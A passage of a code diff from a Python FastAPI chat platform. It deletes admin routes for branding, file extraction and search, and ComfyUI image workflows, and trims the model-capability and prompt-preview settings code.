log.info("agent execution %s by %s", "enabled" if enabled else "disabled", user.email)
if loopback != hosts.MODE_OFF:
log.warning(
"ssh connections to this machine allowed (%s%s) by %s",
loopback,
f", port {loopback_port}" if loopback == hosts.MODE_PORT else "",
user.email,
)
return RedirectResponse("/admin/agents?saved=1", status_code=status.HTTP_303_SEE_OTHER)
-225
View File
@@ -1,225 +0,0 @@
"""Making an instance somebody else's.
One page, four cards, one settings group. Everything it writes goes through
`branding.stored_only`, so a field left at its shipped wording is never written
down and a later release can still improve it — the prompt-fragment rule, and
the reason this page can afford to render every flavour string as an editable
box without freezing all of them the first time somebody presses Save.
`branding.forget()` after every write, and this is the only module that calls
it. The snapshot is a process-level cache read by a Jinja global; a save that
did not drop it would take effect on the next restart, which is the shape of
failure this codebase keeps cataloguing.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, File, Form, Request, Response, UploadFile, status
from fastapi.responses import RedirectResponse
from lembas.api.deps import AdminUser, Db
from lembas.services import branding as branding_service
from lembas.services import settings_store, uploads
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(prefix="/admin/customization", tags=["admin-branding"])
MAX_CUSTOM_CSS = 40_000
# How many custom themes an instance may keep. Not a design limit -- there is
# nothing in `theme_css` that cares -- but the whole set lives in one settings
# row read into a process-level snapshot on every render, and the page offers a
# blank block whenever there is room, so *some* number has to say when to stop
# offering. Twelve is far past what anybody wants and small enough that the
# stylesheet stays a stylesheet.
MAX_THEMES = 12
def _page(request: Request, db: Db, saved: str = "", error: str = "") -> Response:
values = settings_store.get_group(db, branding_service.BRANDING)
brand = branding_service.for_db(db)
return render(
request,
"admin/customization.html",
{
"values": values,
"current": brand,
# The flavour table drives the form, so a string added in code
# appears here with its default in the box and no template change.
"flavour": [
{
"key": key,
"label": label,
"hint": hint,
"default": default,
"value": str(values.get(f"text_{key}") or ""),
}
for key, (label, hint, default) in branding_service.FLAVOUR.items()
],
"tokens": branding_service.THEME_TOKENS,
"custom_themes": [t for t in brand.themes if not t.built_in],
"bases": [name for name, _, _ in branding_service.BUILT_IN],
"max_themes": MAX_THEMES,
"saved": saved,
"error": error,
},
)
@router.get("")
async def customization_page(request: Request, db: Db, user: AdminUser, saved: str = ""):
return _page(request, db, saved=saved)
def _write(db: Db, changes: dict) -> None:
"""Store a change and drop the cache, in that order and always together."""
settings_store.update(db, changes, key=branding_service.BRANDING)
branding_service.forget()
@router.post("/identity")
async def save_identity(
request: Request,
db: Db,
user: AdminUser,
instance_name: str = Form(""),
tagline: str = Form(""),
logo: UploadFile | None = File(None),
favicon: UploadFile | None = File(None),
remove_logo: bool = Form(False),
remove_favicon: bool = Form(False),
) -> Response:
stored = settings_store.get_group(db, branding_service.BRANDING)
changes: dict = {
"instance_name": instance_name.strip()[:120],
"tagline": tagline.strip()[:200],
}
if remove_logo:
for name in (stored.get("logo_path"), *(stored.get("icon_paths") or {}).values()):
uploads.delete_branding_image(str(name or ""))
changes["logo_path"] = ""
changes["icon_paths"] = {}
if remove_favicon:
uploads.delete_branding_image(str(stored.get("favicon_path") or ""))
changes["favicon_path"] = ""
try:
if logo is not None and logo.filename:
payload = await logo.read()
changes["logo_path"] = uploads.save_branding_image(payload, logo.content_type or "")
# Derived here rather than on demand: a launcher asks for a 512px
# PNG and will not scale one itself, and doing it per request would
# mean resizing an image on the path that serves it.
changes["icon_paths"] = uploads.derive_icons(payload)
if favicon is not None and favicon.filename:
payload = await favicon.read()
changes["favicon_path"] = uploads.save_branding_image(
payload, favicon.content_type or ""
)
except uploads.UploadError as exc:
return _page(request, db, error=str(exc))
_write(db, branding_service.stored_only(changes))
log.info("branding identity changed by %s", user.email)
return RedirectResponse(
"/admin/customization?saved=Identity+saved.", status_code=status.HTTP_303_SEE_OTHER
)
@router.post("/flavour")
async def save_flavour(request: Request, db: Db, user: AdminUser) -> Response:
"""The Middle-earth strings.
Read from the raw form rather than declared as parameters, because the set
is `branding.FLAVOUR` and a parameter list would be a second copy of it that
goes stale the first time a string is added. A key that was not submitted is
left alone; one submitted empty falls back to its default, which is what
makes "clear the box" mean "give me the shipped wording back" rather than
"show nothing here".
"""
form = await request.form()
changes = {
f"text_{key}": str(form.get(f"text_{key}") or "").strip()[:400]
for key in branding_service.FLAVOUR
if f"text_{key}" in form
}
_write(db, branding_service.stored_only(changes))
return RedirectResponse(
"/admin/customization?saved=Wording+saved.", status_code=status.HTTP_303_SEE_OTHER
)
@router.post("/css")
async def save_css(db: Db, user: AdminUser, custom_css: str = Form("")) -> Response:
_write(db, {"custom_css": custom_css.strip()[:MAX_CUSTOM_CSS]})
log.info("custom CSS changed by %s", user.email)
return RedirectResponse(
"/admin/customization?saved=Stylesheet+saved.", status_code=status.HTTP_303_SEE_OTHER
)
@router.post("/themes")
async def save_themes(request: Request, db: Db, user: AdminUser) -> Response:
"""Every custom theme, replaced wholesale.
One form for the lot rather than a row each, because a theme is a handful of
colours and the whole set fits on a screen — and because replacing the list
means a theme removed here is gone, with no reconciliation between what was
posted and what was stored.
Nothing is validated here beyond shape. `branding._theme_from` validates on
every **read**, so a theme written straight into the settings table by hand,
or stored by an earlier version, still has to produce a stylesheet that
parses. Validating only on save would put that guarantee in the wrong place.
The indices need not be contiguous and are not renumbered. The page renders
one block per theme plus a blank one, so clearing an id in the middle leaves
a gap -- and a gap is simply an index with no id, which the loop already
skips. Renumbering would be work in aid of nothing.
"""
form = await request.form()
themes = []
for index in range(_theme_count(form)):
theme_id = str(form.get(f"theme_{index}_id") or "").strip().lower()
if not theme_id:
continue
themes.append(
{
"id": theme_id,
"label": str(form.get(f"theme_{index}_label") or "").strip(),
"base": str(form.get(f"theme_{index}_base") or "moria"),
"tokens": {
name: value
for name, _ in branding_service.THEME_TOKENS
if (value := str(form.get(f"theme_{index}_{name}") or "").strip())
},
}
)
# Enforced here as well as in the template, because the template's job is to
# stop offering and this one's is to stop accepting -- a crafted POST is not
# the page.
themes = themes[:MAX_THEMES]
_write(db, {"themes": themes})
log.info("%d custom theme(s) saved by %s", len(themes), user.email)
return RedirectResponse(
"/admin/customization?saved=Themes+saved.", status_code=status.HTTP_303_SEE_OTHER
)
def _theme_count(form) -> int:
"""How many theme blocks the form carried.
Counted from the submitted keys rather than from a hidden field, so a form
rendered by an older page still saves what it holds.
"""
indices = [
int(key.split("_")[1])
for key in form
if key.startswith("theme_") and key.split("_")[1].isdigit()
]
return max(indices) + 1 if indices else 0
-200
View File
@@ -1,200 +0,0 @@
"""What happens to a file between the upload and the model, and how it is found.
Two halves on one page because they are two ends of the same pipeline: what gets
extracted decides what there is to search, and the search settings decide what
becomes of it. Splitting them would mean an administrator setting a 300-page PDF
limit on one screen and wondering on another why half a book is missing from the
index.
Every save drops `files.forget()`, and this is the only module that calls it —
the same discipline `admin_branding` has with the branding snapshot, and for the
same reason: a process-level cache whose save does not drop it is a setting that
takes effect at the next restart.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, Form, Request, Response, status
from fastapi.responses import RedirectResponse
from sqlalchemy import select
from lembas.api.deps import AdminUser, Db
from lembas.db.models import Connection, Model
from lembas.services import files as files_service
from lembas.services import settings_store
from lembas.services.library import indexing
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(prefix="/admin/extraction", tags=["admin-extraction"])
def _embedding_models(db: Db) -> list[Model]:
"""Models an administrator has marked as producing embeddings.
Filtered rather than listed in full, the same shape `/admin/images` uses for
its reviewer: a chat model in this picker is a setting that looks configured
and fails on the first request, which is the shape of failure this codebase
keeps cataloguing.
"""
return [
model
for model in db.scalars(
select(Model).join(Connection).order_by(Model.position, Model.model_id)
)
if (model.capabilities_json or {}).get("embeddings")
]
def _lines(text: str) -> list[str]:
return [line.strip() for line in (text or "").splitlines() if line.strip()]
@router.get("")
async def extraction_page(request: Request, db: Db, user: AdminUser, saved: str = ""):
values = settings_store.extraction(db)
models = _embedding_models(db)
return render(
request,
"admin/extraction.html",
{
"values": values,
"extensions_text": "\n".join(values.get("extra_text_extensions") or []),
"models": models,
# A model that was chosen and has since lost its flag, or its
# connection. Named rather than silently dropped from the picker:
# a setting that vanishes is one nobody can tell from one that was
# never made.
"missing_model": (
values["embedding_model_id"]
if values["embedding_model_id"]
and values["embedding_model_id"] not in {m.model_id for m in models}
else ""
),
"ready": indexing.enabled(db),
"counts": indexing.counts(db),
"progress": indexing.progress(),
"saved": saved,
},
)
@router.post("")
async def save_extraction(
db: Db,
user: AdminUser,
max_upload_mb: int = Form(20),
max_image_edge: int = Form(1400),
jpeg_quality: int = Form(85),
max_pdf_pages: int = Form(300),
max_extracted_chars: int = Form(120_000),
orphan_hours: int = Form(24),
extra_text_extensions: str = Form(""),
reject_unreadable_pdf: bool = Form(False),
) -> Response:
settings_store.update(
db,
{
# Clamped here as well as on read, for the reason the agent settings
# give: a number with no bound is a way to break the instance from
# a form.
"max_upload_mb": min(max(max_upload_mb, 1), 512),
"max_image_edge": min(max(max_image_edge, 128), 8192),
"jpeg_quality": min(max(jpeg_quality, 30), 100),
"max_pdf_pages": min(max(max_pdf_pages, 1), 5000),
"max_extracted_chars": min(max(max_extracted_chars, 1000), 5_000_000),
"orphan_hours": min(max(orphan_hours, 1), 8760),
"extra_text_extensions": _lines(extra_text_extensions),
"reject_unreadable_pdf": reject_unreadable_pdf,
},
key=settings_store.EXTRACTION,
)
files_service.forget()
log.info("extraction settings changed by %s", user.email)
return RedirectResponse(
"/admin/extraction?saved=Extraction+saved.", status_code=status.HTTP_303_SEE_OTHER
)
@router.post("/search")
async def save_search(
db: Db,
user: AdminUser,
embedding_model_id: str = Form(""),
chunk_chars: int = Form(1200),
chunk_overlap: int = Form(150),
embed_batch: int = Form(16),
) -> Response:
"""The semantic half.
Its own form and its own route, because the two halves have different
consequences: changing a chunk size invalidates every vector already stored,
and changing an upload limit does not. Keeping them apart is what lets the
page say so beside the control that does it.
"""
before = settings_store.extraction(db)
settings_store.update(
db,
{
"embedding_model_id": embedding_model_id.strip()[:300],
"chunk_chars": min(max(chunk_chars, 200), 8000),
"chunk_overlap": max(chunk_overlap, 0),
"embed_batch": min(max(embed_batch, 1), 256),
},
key=settings_store.EXTRACTION,
)
files_service.forget()
# Changing the model changes the vector space, so what is stored stops
# meaning anything against a new query. Nothing is deleted -- the scorer
# already skips a width that does not match the query's, so a stale index is
# ignored rather than trusted -- but a rebuild is what makes it useful
# again, and offering it here is cheaper than leaving somebody to notice.
changed = before["embedding_model_id"] != embedding_model_id.strip()
message = "Search+saved."
if changed and embedding_model_id.strip():
message = "Search+saved.+Rebuild+the+index+to+use+the+new+model."
log.info("embedding model set to %r by %s", embedding_model_id, user.email)
return RedirectResponse(
f"/admin/extraction?saved={message}", status_code=status.HTTP_303_SEE_OTHER
)
@router.post("/rebuild")
async def rebuild(request: Request, db: Db, user: AdminUser) -> Response:
"""Start a rebuild, and answer with the progress card.
A background task rather than a request that waits: embedding a library of a
few thousand records is minutes of HTTP round trips, and a page that hangs
for that long is one somebody reloads, which starts a second one.
"""
started = indexing.start_rebuild()
if started:
log.info("index rebuild started by %s", user.email)
return render(
request,
"admin/_index_progress.html",
{"progress": indexing.progress(), "counts": indexing.counts(db), "ready": True},
)
@router.get("/progress")
async def rebuild_progress(request: Request, db: Db, user: AdminUser) -> Response:
"""Polled while a rebuild runs. Stops polling itself when it finishes.
Polled rather than streamed for the reason `/api/chats/unread` is: this is
one small fragment on one page, and an SSE stream for it would be a second
streaming path to keep correct.
"""
return render(
request,
"admin/_index_progress.html",
{
"progress": indexing.progress(),
"counts": indexing.counts(db),
"ready": indexing.enabled(db),
},
)
-462
View File
@@ -1,462 +0,0 @@
"""Image generation administration: the ComfyUI, and the workflows to run on it.
Two shapes on one nav entry, because they are two different kinds of thing. The
connection, the checkpoints and the switches are instance settings and get a
settings page. A workflow is an authored document with a name, a description and
a body, so the workflows are list-plus-detail -- the shape the working notes require
of any admin list, and for the reason it gives: a page that renders a ten-line
JSON textarea per row is unusable at three rows.
Route order matters and is not alphabetical. `/admin/images/workflows/new` is
registered before `/admin/images/workflows/{workflow_id}`, or "new" is captured
as an id and 404s. That has already been a bug twice here.
"""
from __future__ import annotations
import json
import logging
import re
from datetime import UTC, datetime
from typing import Any
from fastapi import APIRouter, Form, HTTPException, Request, Response, status
from fastapi.responses import RedirectResponse
from sqlalchemy import func, select
from lembas.api.deps import AdminUser, Db
from lembas.db.models import ImageWorkflow, Model
from lembas.services import settings_store
from lembas.services.crypto import UNCHANGED_SENTINEL, decrypt, keep_or_replace, mask
from lembas.services.images import comfy
from lembas.services.images import workflow as workflow_service
from lembas.services.llm.openai_client import LLMError
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(prefix="/admin/images", tags=["admin-images"])
SLUG_PATTERN = re.compile(r"^[a-z0-9][a-z0-9_-]{0,47}$")
# The placeholders a workflow has to carry to be worth having. Without a prompt
# it draws the same picture whatever anybody types, which is the one failure
# somebody would not think to look for.
REQUIRED_PLACEHOLDERS = ("prompt",)
def _lines(text: str) -> list[str]:
"""One name per line, blanks dropped. The `admin_agents` pattern."""
seen: list[str] = []
for line in (text or "").splitlines():
name = line.strip()
if name and name not in seen:
seen.append(name)
return seen
def _number(raw: str, name: str, *, whole: bool = True) -> Any:
"""A filled box as a clamped number, an empty one as "".
The empty string is load-bearing and is not a missing value: it is how an
administrator says "no opinion about this one", which `workflow.resolve`
reads as "fall through to the built-in floor". Turning it into a zero here
would silently set every instance to zero steps.
"""
text = (raw or "").strip()
if not text:
return ""
try:
value = float(text)
except ValueError:
return ""
low, high = workflow_service.LIMITS.get(name, (None, None))
if low is not None:
value = min(max(value, low), high)
return int(value) if whole else value
def _config(db: Db) -> comfy.Config:
values = settings_store.images(db)
return comfy.Config(
base_url=str(values.get("base_url") or ""),
api_key=decrypt(str(values.get("api_key_encrypted") or "")),
timeout=30.0,
)
def _page(request: Request, db: Db, **extra) -> Response:
values = settings_store.images(db)
workflows = list(
db.scalars(select(ImageWorkflow).order_by(ImageWorkflow.position, ImageWorkflow.slug))
)
return render(
request,
"admin/images.html",
{
"values": values,
"workflows": workflows,
# Only models an administrator has marked as having vision can
# review, so the picker offers those and nothing else -- a list
# including text-only models would be a list of choices that
# silently do nothing.
"vision_models": list(
db.scalars(
select(Model)
.where(Model.enabled.is_(True))
.order_by(Model.position, Model.model_id)
)
),
"checkpoints_text": "\n".join(values.get("checkpoints") or []),
"masked": mask(decrypt(values.get("api_key_encrypted") or "")),
"unchanged": UNCHANGED_SENTINEL,
**extra,
},
)
@router.get("")
async def images_page(request: Request, db: Db, user: AdminUser, saved: str = "") -> Response:
return _page(request, db, saved=saved)
@router.post("")
async def save_images(
request: Request,
db: Db,
user: AdminUser,
enabled: bool = Form(False),
base_url: str = Form(""),
api_key: str = Form(""),
timeout: float = Form(600.0),
checkpoints: str = Form(""),
default_workflow_id: str = Form(""),
review_enabled: bool = Form(False),
review_model_id: str = Form(""),
max_tries: int = Form(4),
preserve_vram: bool = Form(False),
instructions: str = Form(""),
# The generation defaults. Every one is a *string* even where it is a
# number, because "" is how an administrator says "no opinion" and an
# `int = Form(0)` cannot express that -- zero steps is a value, and one
# somebody could mean. `_number` below turns a filled box into a clamped
# number and an empty one back into "".
default_checkpoint: str = Form(""),
default_steps: str = Form(""),
default_cfg: str = Form(""),
default_width: str = Form(""),
default_height: str = Form(""),
default_sampler: str = Form(""),
default_scheduler: str = Form(""),
default_denoise: str = Form(""),
default_negative: str = Form(""),
default_batch: str = Form(""),
) -> Response:
"""Save the settings.
Every toggle defaults to False because an unticked checkbox is simply absent
from a form post -- that absence *is* the off signal, the rule
`admin_audio` states.
The discovered sampler and scheduler lists are deliberately not submitted
and not cleared here: they belong to whatever ComfyUI was tested, and a save
that only changed the instructions box has no opinion about them.
"""
current = settings_store.images(db)
settings_store.update(
db,
{
"enabled": enabled,
"base_url": base_url.strip().rstrip("/"),
"api_key_encrypted": keep_or_replace(
api_key, current.get("api_key_encrypted") or ""
),
"timeout": min(max(timeout, 10.0), 3600.0),
"checkpoints": _lines(checkpoints),
"default_workflow_id": default_workflow_id.strip(),
"review_enabled": review_enabled,
"review_model_id": review_model_id.strip(),
"max_tries": min(max(max_tries, 1), 10),
"preserve_vram": preserve_vram,
"instructions": instructions.strip()[:4000],
# Clamped here to the same bounds `workflow.LIMITS` uses on the way
# out. Twice, deliberately: a number stored by an earlier version,
# or written straight into the settings row, still has to be safe
# when a generation reads it.
"default_checkpoint": default_checkpoint.strip(),
"default_steps": _number(default_steps, "steps"),
"default_cfg": _number(default_cfg, "cfg", whole=False),
"default_width": _number(default_width, "width"),
"default_height": _number(default_height, "height"),
"default_sampler": default_sampler.strip(),
"default_scheduler": default_scheduler.strip(),
"default_denoise": _number(default_denoise, "denoise", whole=False),
"default_negative": default_negative.strip()[:500],
"default_batch": _number(default_batch, "batch"),
},
key=settings_store.IMAGES,
)
log.info("image generation %s by %s", "enabled" if enabled else "disabled", user.email)
return RedirectResponse(
"/admin/images?saved=Saved.", status_code=status.HTTP_303_SEE_OTHER
)
@router.post("/test")
async def test_images(request: Request, db: Db, user: AdminUser) -> Response:
"""Ask ComfyUI what it can do, and remember the answer.
Against the *saved* settings rather than the unsaved form, so what is tested
is what a chat would actually reach -- the same rule `/admin/search/test`
follows.
The lists are stored rather than only shown, because the request path may
never ask ComfyUI anything: `harness.context_variables` is synchronous and
the tool schema is built per request, so both read what this button wrote.
"""
config = _config(db)
if not config.configured:
return render(
request,
"admin/_images_result.html",
{"message": "Set a base URL first.", "message_kind": "error"},
)
try:
checkpoints, samplers, schedulers = await comfy.discover(config)
except LLMError as exc:
return render(
request,
"admin/_images_result.html",
{"message": exc.message, "message_kind": "error"},
)
stored = settings_store.images(db)
changes: dict = {"samplers": samplers, "schedulers": schedulers}
# The checkpoint list is filled in only when nobody has one yet, for the
# reason a refreshed connection does not overwrite a context length an
# administrator typed: they are usually narrowing it deliberately.
if not stored.get("checkpoints"):
changes["checkpoints"] = checkpoints
settings_store.update(db, changes, key=settings_store.IMAGES)
found = (
f"Found {len(checkpoints)} checkpoint{'' if len(checkpoints) == 1 else 's'}, "
f"{len(samplers)} samplers and {len(schedulers)} schedulers."
)
return render(
request,
"admin/_images_result.html",
{
"message": found,
"message_kind": "success",
"checkpoints": checkpoints,
"kept": bool(stored.get("checkpoints")),
},
)
# --- Workflows -----------------------------------------------------------------
def _workflow(db: Db, workflow_id: str) -> ImageWorkflow:
row = db.get(ImageWorkflow, workflow_id)
if row is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That workflow no longer exists.")
return row
def _placeholder_help(db: Db) -> list[tuple[str, str, str, str]]:
"""Every placeholder, what it fills, and what it resolves to *today*.
The last column is the point. A legend listing names answers "what may I
write"; the question somebody actually has, standing in front of a workflow
that came out wrong, is "what happens if I leave this out" -- and the answer
moved the day instance defaults arrived. Resolved through the same call a
generation makes, so the two cannot disagree.
"""
resolved = workflow_service.resolve({}, settings=settings_store.images(db))
out: list[tuple[str, str, str, str]] = []
for name in workflow_service.PLACEHOLDERS:
kind, what = workflow_service.DESCRIPTIONS.get(name, ("text", ""))
if name == "prompt":
shown = "whatever is asked for"
elif name == "seed":
shown = "a fresh random one"
elif name == "model":
shown = str(resolved.get("model") or "") or "the first checkpoint listed"
else:
shown = str(resolved.get(name, ""))
out.append((name, kind, what, shown))
return out
def _detail(
request: Request, db: Db, row: ImageWorkflow, *, is_new: bool, error: str = "", **extra
):
return render(
request,
"admin/workflow_detail.html",
{
"workflow": row,
"is_new": is_new,
"error": error,
"placeholders": workflow_service.PLACEHOLDERS,
"placeholder_help": _placeholder_help(db),
"workflow_text": extra.pop(
"workflow_text", json.dumps(row.workflow_json or {}, indent=2)
),
**extra,
},
)
def _populate(row: ImageWorkflow, form) -> None:
row.name = str(form.get("name") or "").strip()[:120]
row.description = str(form.get("description") or "").strip()[:2000]
row.enabled = "enabled" in form
def _problem(db: Db, row: ImageWorkflow, form, *, existing_id: str = "") -> str:
"""Why this cannot be saved, or an empty string.
A sentence rather than a 422, so a rejected save re-renders the form with
what was typed still in it -- losing forty lines of JSON to a validation
error is not a thing to do to somebody.
"""
if not row.name:
return "A workflow needs a name."
slug = str(form.get("slug") or "").strip().lower()
if not SLUG_PATTERN.match(slug):
return (
"The name the model uses must be lowercase letters, digits, "
"hyphens or underscores, and start with a letter or digit."
)
clash = db.scalar(select(ImageWorkflow).where(ImageWorkflow.slug == slug))
if clash is not None and clash.id != existing_id:
return f"There is already a workflow called “{slug}”."
row.slug = slug
raw = str(form.get("workflow") or "").strip()
if not raw:
return "Paste the workflow, in ComfyUI's API format."
try:
parsed = json.loads(raw)
except json.JSONDecodeError as exc:
return f"That is not valid JSON: {exc}"
if not isinstance(parsed, dict) or not parsed:
return (
"A ComfyUI API workflow is a JSON object keyed by node id. Use "
"“Export (API)” in ComfyUI rather than “Save”."
)
# The check worth having: a workflow with no {{prompt}} in it draws the same
# picture whatever anybody types, and would look like a broken model rather
# than an unparameterised template.
found = workflow_service.placeholders_in(parsed)
missing = [name for name in REQUIRED_PLACEHOLDERS if name not in found]
if missing:
return (
f"The workflow never uses {{{{{missing[0]}}}}}, so every image would be "
f"the same. Put it where the text prompt goes."
)
unknown = found - set(workflow_service.PLACEHOLDERS)
if unknown:
return f"Unknown placeholder {{{{{sorted(unknown)[0]}}}}}."
row.workflow_json = parsed
return ""
@router.get("/workflows/new")
async def new_workflow(request: Request, db: Db, user: AdminUser) -> Response:
"""A draft, never persisted -- the `admin_tools` shape.
Registered before `/workflows/{workflow_id}`: FastAPI matches in
registration order, and with the parameterised route first "new" is an id.
"""
from pathlib import Path
base = Path(__file__).resolve().parent.parent / "services/images/base_workflow.json"
draft = ImageWorkflow(
slug="",
name="",
description="",
workflow_json=json.loads(base.read_text(encoding="utf-8")),
enabled=True,
)
return _detail(request, db, draft, is_new=True)
@router.post("/workflows")
async def create_workflow(request: Request, db: Db, user: AdminUser) -> Response:
form = await request.form()
row = ImageWorkflow(workflow_json={})
_populate(row, form)
problem = _problem(db, row, form)
if problem:
return _detail(
request,
db,
row,
is_new=True,
error=problem,
workflow_text=str(form.get("workflow") or ""),
)
row.position = (
db.scalar(select(func.coalesce(func.max(ImageWorkflow.position), -1))) or -1
) + 1
db.add(row)
db.commit()
log.info("%s added image workflow %s", user.email, row.slug)
return RedirectResponse(
f"/admin/images?saved=Added {row.name}.", status_code=status.HTTP_303_SEE_OTHER
)
@router.get("/workflows/{workflow_id}/edit")
async def edit_workflow(request: Request, db: Db, user: AdminUser, workflow_id: str) -> Response:
return _detail(request, db, _workflow(db, workflow_id), is_new=False)
@router.post("/workflows/{workflow_id}/delete")
async def delete_workflow(db: Db, user: AdminUser, workflow_id: str) -> Response:
row = _workflow(db, workflow_id)
name = row.name
db.delete(row)
db.commit()
log.info("%s deleted image workflow %s", user.email, name)
return RedirectResponse(
f"/admin/images?saved=Deleted {name}.", status_code=status.HTTP_303_SEE_OTHER
)
@router.post("/workflows/{workflow_id}")
async def update_workflow(request: Request, db: Db, user: AdminUser, workflow_id: str) -> Response:
row = _workflow(db, workflow_id)
form = await request.form()
# Validated against a draft, so a rejected save leaves the stored row alone
# and the form still holds what was typed.
draft = ImageWorkflow(workflow_json={}, position=row.position)
_populate(draft, form)
problem = _problem(db, draft, form, existing_id=row.id)
if problem:
draft.id = row.id
return _detail(
request,
db,
draft,
is_new=False,
error=problem,
workflow_text=str(form.get("workflow") or ""),
)
_populate(row, form)
row.slug = draft.slug
row.workflow_json = draft.workflow_json
row.last_checked_at = datetime.now(UTC)
row.last_error = ""
db.commit()
log.info("%s updated image workflow %s", user.email, row.slug)
return RedirectResponse(
f"/admin/images?saved=Saved {row.name}.", status_code=status.HTTP_303_SEE_OTHER
)
+4 -37
View File
@@ -12,7 +12,6 @@ from sqlalchemy.orm import Session as DBSession
from lembas.api.deps import AdminUser, Db, RequiredUser
from lembas.db.models import Connection, Group, Model
from lembas.services import chat as chat_service
from lembas.services import settings_store, uploads
from lembas.services.llm.openai_client import MAX_CONTEXT
from lembas.web.templating import render
@@ -23,36 +22,17 @@ router = APIRouter(tags=["admin-models"])
# What the endpoint can do. Endpoints do not advertise any of this reliably, so
# these are an administrator's assertion.
# `embeddings` is the odd one out and is worth naming as such: the other three
# say what a model can do in a *chat*, and this one says it is not for chatting
# at all. It is what /admin/extraction picks from, and nothing else reads it.
PROTOCOL_CAPABILITIES = ("reasoning", "vision", "tools", "embeddings")
PROTOCOL_CAPABILITIES = ("reasoning", "vision", "tools")
# Which tools this model is given. Distinct from the above: `tools` is whether a
# tools array may be sent at all, these are what goes in it. Every one of them is
# meaningless unless `tools` is on.
#
# The last two are gates rather than single tools: one covers every custom HTTP
# tool an administrator has defined, the other every MCP server. Which of those
# a particular person gets is the tool's own group list, not a flag here -- a
# server can advertise forty tools, and a model page listing all of them is a
# page nobody can read.
# Which built-in tools this model is given. Distinct from the above: `tools` is
# whether a tools array may be sent at all, these are what goes in it. Every one
# of them is meaningless unless `tools` is on.
TOOL_CAPABILITIES = (
("tool_web_search", "Web search"),
("tool_fetch", "Fetch a page"),
("tool_knowledge", "Knowledge"),
("tool_notes", "Notes"),
("tool_memory", "Memory"),
("tool_skills", "Skills"),
("tool_custom", "Custom tools"),
("tool_mcp", "MCP servers"),
("tool_ask", "Ask the reader"),
("tool_report", "Reports"),
("tool_image", "Image generation"),
("tool_scratch", "Canvas"),
("tool_schedule", "Scheduling"),
("tool_subagent", "Helpers"),
("tool_agent", "Agent execution"),
)
CAPABILITIES = PROTOCOL_CAPABILITIES + tuple(key for key, _ in TOOL_CAPABILITIES)
@@ -177,7 +157,6 @@ async def model_detail(
"groups": list(db.scalars(select(Group).order_by(Group.name))),
"capabilities": PROTOCOL_CAPABILITIES,
"tool_capabilities": TOOL_CAPABILITIES,
"efforts": chat_service.EFFORTS,
# Rows predating the split have no tool_* keys at all. Showing them
# unticked would be a lie: tools.enabled_tools treats absent as on
# when `tools` is on, so that an upgrade does not silently take web
@@ -237,7 +216,6 @@ async def update_model(
public: bool = Form(False),
position: str = Form(""),
context_length: str = Form(""),
default_effort: str = Form(""),
group_ids: list[str] = Form(default=[]),
capability: list[str] = Form(default=[]),
) -> Response:
@@ -257,17 +235,6 @@ async def update_model(
model.pinned = pinned
model.public = public
# Merged rather than rebuilt, unlike the capabilities below: params_json
# holds whatever sampling defaults an administrator has set and this form
# only carries one of them.
params = dict(model.params_json or {})
wanted = default_effort.strip().lower()
if wanted in chat_service.EFFORTS:
params["reasoning_effort"] = wanted
else:
params.pop("reasoning_effort", None)
model.params_json = params
# Absent checkboxes are simply missing from a form post, so the submitted
# list IS the complete new state -- rebuild rather than merge.
model.capabilities_json = {name: (name in capability) for name in CAPABILITIES}
+17 -102
View File
@@ -18,7 +18,6 @@ from lembas.services import harness as harness_service
from lembas.services import prompts as prompts_service
from lembas.services import settings_store
from lembas.services import tools as tools_service
from lembas.services.agent import policy
from lembas.web.templating import render
log = logging.getLogger(__name__)
@@ -29,64 +28,16 @@ router = APIRouter(prefix="/admin/prompts", tags=["admin-prompts"])
# in place rather than imagined. An administrator can clear the field.
SAMPLE_DOCUMENTS = "report.pdf, notes.txt"
# The rest of what a preview has to pretend, and the reason it must.
#
# `harness.context_variables` fills most `requires` gates only when it is handed
# a real `Chat` -- the machine, the directory, the plan, the project listing, a
# scheduled task's instruction, the flag saying this is a helper. The preview
# passes `chat=None`, so every one of those stayed empty and **eleven gated
# fragments could never appear in it at all**: the whole agent surface, both
# scheduling fragments, and the helper warning. An administrator editing
# `tool.agent` previewed a system message with `tool.agent` missing from it, and
# nothing said so.
#
# Samples rather than a transient Chat. `compose_from` takes plain variables
# precisely so this screen never has to build one, and a constructed row would
# need a connection, a profile and a directory that exist -- inventing an SSH
# host to render a paragraph is a worse trade than inventing the paragraph's
# values. This is what `SAMPLE_DOCUMENTS` has always done, extended to the rest.
SAMPLE_AGENT = {
"agent_target": "buildbox",
"agent_dir": "/srv/www/example",
"agent_rewound": "on 3 August at 14:20",
"background": "on",
"project_files": "src/\n app.py\n models.py\nREADME.md\npyproject.toml",
"agent_instructions": "Run the tests with `make check` before proposing a change.",
"agent_instructions_file": "AGENTS.md",
"plan": "1. [done] Read the failing test\n2. [doing] Fix the parser\n3. [todo] Add a case",
}
SAMPLE_SCHEDULE = {
"schedule_instruction": "Summarise what changed in the repository since yesterday.",
"schedule_summary": "every weekday at 08:00",
}
# Situations a chat can be in that are not a tool family, so nothing on the
# "Tools offered" row can reach them. `kind` and `parent_chat_id` in the model.
SITUATION_ORDINARY = ""
SITUATION_TASK = "task"
SITUATION_HELPER = "helper"
SITUATIONS = (
(SITUATION_ORDINARY, "An ordinary chat"),
(SITUATION_TASK, "A scheduled task, running unattended"),
(SITUATION_HELPER, "A helper sent by another model"),
)
def _families_of(db: Db, names: list[str]) -> list[str]:
"""Keep only real family names, in the registry's order.
Read from the database rather than the constant: a family can belong to an
administrator-defined tool, and one the preview cannot name is one whose
guidance cannot be checked here.
"""
def _families_of(names: list[str]) -> list[str]:
"""Keep only real family names, in the registry's order."""
wanted = set(names)
return [family for family in tools_service.families(db) if family in wanted]
return [family for family in tools_service.FAMILIES if family in wanted]
def _tool_names(db: Db, families: list[str]) -> str:
def _tool_names(families: list[str]) -> str:
return ", ".join(
name for name, tool in tools_service.registry(db).items() if tool.family in families
name for name, tool in tools_service.REGISTRY.items() if tool.family in families
)
@@ -98,8 +49,6 @@ def _variables(
model_name: str = "",
bases: str = "",
documents: str = "",
situation: str = SITUATION_ORDINARY,
mode: str = "",
) -> dict[str, str]:
"""The preview's variable values.
@@ -110,14 +59,7 @@ def _variables(
No Chat row is made. `harness.compose_from` takes plain variables precisely
so that this screen never has to build a transient one.
